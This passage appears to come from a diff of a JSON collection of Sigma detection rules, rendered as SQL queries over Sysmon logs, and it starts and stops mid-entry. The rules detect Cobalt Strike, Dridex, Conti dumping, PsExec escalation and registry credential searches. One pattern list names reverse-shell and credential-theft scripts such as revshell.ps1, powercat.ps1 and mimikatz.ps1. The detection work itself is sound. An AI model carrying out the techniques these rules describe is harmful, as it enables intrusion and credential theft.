'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ + "attack.t1204", + "attack.t1566.001", "attack.execution", - "attack.t1218" + "attack.initial_access" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.001" ], "falsepositives": [ - "Unknown" + "False positives are expected with legitimate \".CHM\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% 
StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "PUA - 
NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND 
CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", + "status": "test", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((Image LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' 
ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "title": "Password Provided In Command Line Of Net.EXE", + "id": 
"d4498716-1d52-438f-8084-4a603157d131", "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_use_password_plaintext.yml" + }, + { + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE 
'%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects exeuctable names or flags 
